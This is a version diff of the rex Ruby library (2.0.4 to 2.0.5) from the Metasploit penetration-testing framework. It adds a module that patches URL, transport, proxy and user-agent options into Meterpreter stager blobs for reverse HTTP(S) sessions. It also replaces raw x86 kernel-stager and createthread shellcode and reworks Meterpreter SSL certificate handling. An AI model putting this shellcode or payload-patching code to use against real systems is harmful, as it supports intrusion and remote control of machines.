rex 2.0.4 → 2.0.5

data/lib/rex/mime/message.rb

@@ -24,11 +24,11 @@ class Message
       self.header.parse(head)
       ctype = self.header.find('Content-Type')
 
-      if ctype and ctype[1] and ctype[1] =~ /multipart\/mixed;\s*boundary="?([A-Za-z0-9'\(\)\+\_,\-\.\/:=\?^\s]+)"?/
+      if ctype && ctype[1] && ctype[1] =~ /multipart\/mixed;\s*boundary="?([A-Za-z0-9'\(\)\+\_,\-\.\/:=\?^\s]+)"?/
         self.bound = $1
         chunks = body.to_s.split(/--#{self.bound}(--)?\r?\n/)
         self.content = chunks.shift.to_s.gsub(/\s+$/, '')
-        self.content << "\r\n" if not self.content.empty?
+        self.content << "\r\n" unless self.content.empty?
 
         chunks.each do |chunk|
           break if chunk == "--"
@@ -88,15 +88,13 @@ class Message
   def add_part(data='', content_type='text/plain', transfer_encoding="8bit", content_disposition=nil)
     part = Rex::MIME::Part.new
 
-    if (content_disposition)
+    if content_disposition
       part.header.set("Content-Disposition", content_disposition)
     end
 
-    if (content_type)
-      part.header.set("Content-Type", content_type)
-    end
+    part.header.set("Content-Type", content_type) if content_type
 
-    if (transfer_encoding)
+    if transfer_encoding
       part.header.set("Content-Transfer-Encoding", transfer_encoding)
     end
 
@@ -125,20 +123,17 @@ class Message
   end
 
   def to_s
-    msg = force_crlf(self.header.to_s + "\r\n")
+    header_string = self.header.to_s
 
-    unless self.content.blank?
-      msg << force_crlf(self.content + "\r\n")
-    end
+    msg = header_string.empty? ? '' : force_crlf(self.header.to_s + "\r\n")
+    msg << force_crlf(self.content + "\r\n") unless self.content.blank?
 
     self.parts.each do |part|
       msg << force_crlf("--" + self.bound + "\r\n")
       msg << part.to_s
     end
 
-    if self.parts.length > 0
-      msg << force_crlf("--" + self.bound + "--\r\n")
-    end
+    msg << force_crlf("--" + self.bound + "--\r\n") if self.parts.length > 0
 
     msg
   end

data/lib/rex/payloads.rb

@@ -1,2 +1,3 @@
 # -*- coding: binary -*-
 require 'rex/payloads/win32'
+require 'rex/payloads/meterpreter'

data/lib/rex/payloads/meterpreter.rb

@@ -0,0 +1,2 @@
+# -*- coding: binary -*-
+require 'rex/payloads/meterpreter/patch'

data/lib/rex/payloads/meterpreter/patch.rb

@@ -0,0 +1,136 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Payloads
+    module Meterpreter
+      ###
+      #
+      # Provides methods to patch options into metsrv stagers
+      #
+      ###
+      module Patch
+
+        # Replace the transport string
+        def self.patch_transport! blob, ssl
+
+          i = blob.index("METERPRETER_TRANSPORT_SSL")
+          if i
+            str = ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
+            blob[i, str.length] = str
+          end
+
+        end
+
+        # Replace the URL
+        def self.patch_url! blob, url
+
+          i = blob.index("https://" + ("X" * 256))
+          if i
+            str = url
+            blob[i, str.length] = str
+          end
+
+        end
+
+        # Replace the session expiration timeout
+        def self.patch_expiration! blob, expiration
+
+          i = blob.index([0xb64be661].pack("V"))
+          if i
+            str = [ expiration ].pack("V")
+            blob[i, str.length] = str
+          end
+
+        end
+
+        # Replace the session communication timeout
+        def self.patch_comm_timeout! blob, comm_timeout
+
+          i = blob.index([0xaf79257f].pack("V"))
+          if i
+            str = [ comm_timeout ].pack("V")
+            blob[i, str.length] = str
+          end
+
+        end
+
+        # Replace the user agent string with our option
+        def self.patch_ua! blob, ua
+
+          ua = ua[0,255] + "\x00"
+          i = blob.index("METERPRETER_UA\x00")
+          if i
+            blob[i, ua.length] = ua
+          end
+
+        end
+
+        # Activate a custom proxy
+        def self.patch_proxy! blob, proxyhost, proxyport, proxy_type
+
+          i = blob.index("METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+          if i
+            if proxyhost
+              if proxyhost.to_s != ""
+                proxyhost = proxyhost.to_s
+                proxyport = proxyport.to_s || "8080"
+                proxyinfo = proxyhost + ":" + proxyport
+                if proxyport == "80"
+                  proxyinfo = proxyhost
+                end
+                if proxy_type.to_s == 'HTTP'
+                  proxyinfo = 'http://' + proxyinfo
+                else #socks
+                  proxyinfo = 'socks=' + proxyinfo
+                end
+                proxyinfo << "\x00"
+                blob[i, proxyinfo.length] = proxyinfo
+              end
+            end
+          end
+
+        end
+
+        # Proxy authentification
+        def self.patch_proxy_auth! blob, proxy_username, proxy_password, proxy_type
+
+          unless (proxy_username.nil? or proxy_username.empty?) or
+            (proxy_password.nil? or proxy_password.empty?) or
+            proxy_type == 'SOCKS'
+
+            proxy_username_loc = blob.index("METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+            proxy_username = proxy_username << "\x00"
+            blob[proxy_username_loc, proxy_username.length] = proxy_username
+
+            proxy_password_loc = blob.index("METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+            proxy_password = proxy_password << "\x00"
+            blob[proxy_password_loc, proxy_password.length] = proxy_password
+          end
+
+        end
+
+        # Patch options into metsrv for reverse HTTP payloads
+        def self.patch_passive_service! blob, options
+
+          patch_transport! blob, options[:ssl]
+          patch_url! blob, options[:url]
+          patch_expiration! blob, options[:expiration]
+          patch_comm_timeout! blob, options[:comm_timeout]
+          patch_ua! blob, options[:ua]
+          patch_proxy!(blob,
+            options[:proxyhost],
+            options[:proxyport],
+            options[:proxy_type]
+          )
+          patch_proxy_auth!(blob,
+            options[:proxy_username],
+            options[:proxy_password],
+            options[:proxy_type]
+          )
+
+        end
+
+      end
+    end
+  end
+end

data/lib/rex/payloads/win32/kernel/stager.rb

@@ -47,19 +47,21 @@ module Stager
     checksum  = process[0] + ( process[2] << 8 )  + ( process[1] << 16 ) + ( process[3] << 24 )
 
     # The ring0 -> ring3 payload blob.
-    r0 =	"\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
-        "\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
-        "\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
-        "\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
-        "\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
-        "\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
-        "\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
-        "\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
-        "\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
-        "\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
-        "\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
-        "\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
-        "\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
+    # Full assembly source at:
+    #   external/source/shellcode/windows/x86/src/kernel/stager_sysenter_hook.asm
+    r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x5D" +
+      "\x8B\x7E\x61\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
+      "\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
+      "\x58\x8B\x58\x54\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
+      "\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x31" +
+      "\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x25\x8B\x58\x5C\x8D" +
+      "\x5B\x69\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
+      "\x00\x74\x0E\xBA\x45\x45\x45\x45\x83\xC2\x04\x81\x22\xFF\xFF\xFF" +
+      "\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43\x43\x43\x43" +
+      "\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2B\x8B\x43\x10" +
+      "\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9\x44\x44\x44" +
+      "\x44\x75\x15\xE8\x07\x00\x00\x00\xE8\x0D\x00\x00\x00\xEB\x09\xB9" +
+      "\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
 
     # The ring3 payload.
     r3  = ''
@@ -125,20 +127,19 @@ protected
   # Stub to run a prepended ring3 payload in a new thread.
   #
   # Full assembly source at:
-  # /msf3/external/source/shellcode/windows/x86/src/single/createthread.asm
+  #   external/source/shellcode/windows/x86/src/single/createthread.asm
   #
   def self._createthread
-    r3 =    "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-        "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-        "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-        "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-        "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-        "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-        "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-        "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-        "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-        "\x31\xC0\x50\x50\x50\x8D\x9D\xA0\x00\x00\x00\x53\x50\x50\x68\x38" +
-        "\x68\x0D\x16\xFF\xD5\xC3\x58"
+    r3 = "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
+      "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
+      "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
+      "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
+      "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
+      "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
+      "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
+      "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
+      "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x31\xC0\x50\x50\x50\x8D\x9D" +
+      "\x99\x00\x00\x00\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5\xC3\x58"
     return r3
   end
 

data/lib/rex/post/meterpreter/client.rb

@@ -42,9 +42,9 @@ class Client
   @@ext_hash = {}
 
   #
-  # Cached SSL certificate (required to scale)
+  # Cached auto-generated SSL certificate
   #
-  @@ssl_ctx = nil
+  @@ssl_cached_cert = nil
 
   #
   # Mutex to synchronize class-wide operations
@@ -106,7 +106,6 @@ class Client
     self.capabilities = opts[:capabilities] || {}
     self.commands     = []
 
-
     self.conn_id      = opts[:conn_id]
     self.url          = opts[:url]
     self.ssl          = opts[:ssl]
@@ -116,9 +115,21 @@ class Client
 
     self.response_timeout = opts[:timeout] || self.class.default_timeout
     self.send_keepalives  = true
+
+    # TODO: Clarify why we don't allow unicode to be set in initial options
     # self.encode_unicode   = opts.has_key?(:encode_unicode) ? opts[:encode_unicode] : true
     self.encode_unicode = false
 
+    # The SSL certificate is being passed down as a file path
+    if opts[:ssl_cert]
+      if ! ::File.exists? opts[:ssl_cert]
+        elog("SSL certificate at #{opts[:ssl_cert]} does not exist and will be ignored")
+      else
+        # Load the certificate the same way that SslTcpServer does it
+        self.ssl_cert = ::File.read(opts[:ssl_cert])
+      end
+    end
+
     if opts[:passive_dispatcher]
       initialize_passive_dispatcher
 
@@ -200,68 +211,43 @@ class Client
   end
 
   def generate_ssl_context
-    @@ssl_mutex.synchronize do
-    if not @@ssl_ctx
-
-    wlog("Generating SSL certificate for Meterpreter sessions")
-
-    key  = OpenSSL::PKey::RSA.new(1024){ }
-    cert = OpenSSL::X509::Certificate.new
-    cert.version = 2
-    cert.serial  = rand(0xFFFFFFFF)
-
-    # Depending on how the socket was created, getsockname will
-    # return either a struct sockaddr as a String (the default ruby
-    # Socket behavior) or an Array (the extend'd Rex::Socket::Tcp
-    # behavior). Avoid the ambiguity by always picking a random
-    # hostname. See #7350.
-    subject_cn = Rex::Text.rand_hostname
-
-    subject = OpenSSL::X509::Name.new([
-        ["C","US"],
-        ['ST', Rex::Text.rand_state()],
-        ["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
-        ["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
-        ["CN", subject_cn],
-      ])
-    issuer = OpenSSL::X509::Name.new([
-        ["C","US"],
-        ['ST', Rex::Text.rand_state()],
-        ["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
-        ["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
-        ["CN", Rex::Text.rand_text_alpha(rand(20) + 10)],
-      ])
-
-    cert.subject = subject
-    cert.issuer = issuer
-    cert.not_before = Time.now - (3600 * 365) + rand(3600 * 14)
-    cert.not_after = Time.now + (3600 * 365) + rand(3600 * 14)
-    cert.public_key = key.public_key
-    ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
-    cert.extensions = [
-      ef.create_extension("basicConstraints","CA:FALSE"),
-      ef.create_extension("subjectKeyIdentifier","hash"),
-      ef.create_extension("extendedKeyUsage","serverAuth"),
-      ef.create_extension("keyUsage","keyEncipherment,dataEncipherment,digitalSignature")
-    ]
-    ef.issuer_certificate = cert
-    cert.add_extension ef.create_extension("authorityKeyIdentifier", "keyid:always,issuer:always")
-    cert.sign(key, OpenSSL::Digest::SHA1.new)
-
-    ctx = OpenSSL::SSL::SSLContext.new
-    ctx.key = key
-    ctx.cert = cert
 
-    ctx.session_id_context = Rex::Text.rand_text(16)
+    ctx = nil
+    ssl_cert_info = nil
 
-    wlog("Generated SSL certificate for Meterpreter sessions")
+    loop do
 
-    @@ssl_ctx = ctx
+      # Load a custom SSL certificate if one has been specified
+      if self.ssl_cert
+        wlog("Loading custom SSL certificate for Meterpreter session")
+        ssl_cert_info = Rex::Socket::SslTcpServer.ssl_parse_pem(self.ssl_cert)
+        wlog("Loaded custom SSL certificate for Meterpreter session")
+        break
+      end
 
-    end # End of if not @ssl_ctx
-    end # End of mutex.synchronize
+      # Generate a certificate if necessary and cache it
+      if ! @@ssl_cached_cert
+        @@ssl_mutex.synchronize do
+          wlog("Generating SSL certificate for Meterpreter sessions")
+          @@ssl_cached_cert = Rex::Socket::SslTcpServer.ssl_generate_certificate
+          wlog("Generated SSL certificate for Meterpreter sessions")
+        end
+      end
+
+      # Use the cached certificate
+      ssl_cert_info = @@ssl_cached_cert
+      break
+    end
 
-    @@ssl_ctx
+    # Create a new context for each session
+    ctx = OpenSSL::SSL::SSLContext.new()
+    ctx.key = ssl_cert_info[0]
+    ctx.cert = ssl_cert_info[1]
+    ctx.extra_chain_cert = ssl_cert_info[2]
+    ctx.options = 0
+    ctx.session_id_context = Rex::Text.rand_text(16)
+
+    ctx
   end
 
   ##
@@ -453,6 +439,10 @@ class Client
   #
   attr_accessor :ssl
   #
+  # Use this SSL Certificate (unified PEM)
+  #
+  attr_accessor :ssl_cert
+  #
   # The Session Expiration Timeout
   #
   attr_accessor :expiration

data/lib/rex/post/meterpreter/client_core.rb

@@ -8,6 +8,9 @@ require 'rex/post/meterpreter/client'
 # argument for moving the meterpreter client into the Msf namespace.
 require 'msf/core/payload/windows'
 
+# Provides methods to patch options into the metsrv stager.
+require 'rex/payloads/meterpreter/patch'
+
 module Rex
 module Post
 module Meterpreter
@@ -228,31 +231,21 @@ class ClientCore < Extension
 
     if client.passive_service
 
-      # Replace the transport string first (TRANSPORT_SOCKET_SSL
-      i = blob.index("METERPRETER_TRANSPORT_SSL")
-      if i
-        str = client.ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
-        blob[i, str.length] = str
-      end
-
-      conn_id = self.client.conn_id
-      i = blob.index("https://" + ("X" * 256))
-      if i
-        str = self.client.url
-        blob[i, str.length] = str
-      end
+      #
+      # Patch options into metsrv for reverse HTTP payloads
+      #
+      Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
+        :ssl            =>  client.ssl,
+        :url            =>  self.client.url,
+        :expiration     => self.client.expiration,
+        :comm_timeout   =>  self.client.comm_timeout,
+        :ua             =>  client.exploit_datastore['MeterpreterUserAgent'],
+        :proxyhost      =>  client.exploit_datastore['PROXYHOST'],
+        :proxyport      =>  client.exploit_datastore['PROXYPORT'],
+        :proxy_type     =>  client.exploit_datastore['PROXY_TYPE'],
+        :proxy_username =>  client.exploit_datastore['PROXY_USERNAME'],
+        :proxy_password =>  client.exploit_datastore['PROXY_PASSWORD']
 
-      i = blob.index([0xb64be661].pack("V"))
-      if i
-        str = [ self.client.expiration ].pack("V")
-        blob[i, str.length] = str
-      end
-
-      i = blob.index([0xaf79257f].pack("V"))
-      if i
-        str = [ self.client.comm_timeout ].pack("V")
-        blob[i, str.length] = str
-      end
     end
 
     # Build the migration request
@@ -287,7 +280,7 @@ class ClientCore < Extension
         # good bet that migration failed and the remote side is hung.
         # Since we have the comm_mutex here, we *must* release it to
         # keep from hanging the packet dispatcher thread, which results
-        # in blocking the entire process. See Redmine #8794
+        # in blocking the entire process.
         begin
           Timeout.timeout(60) do
             # Renegotiate SSL over this socket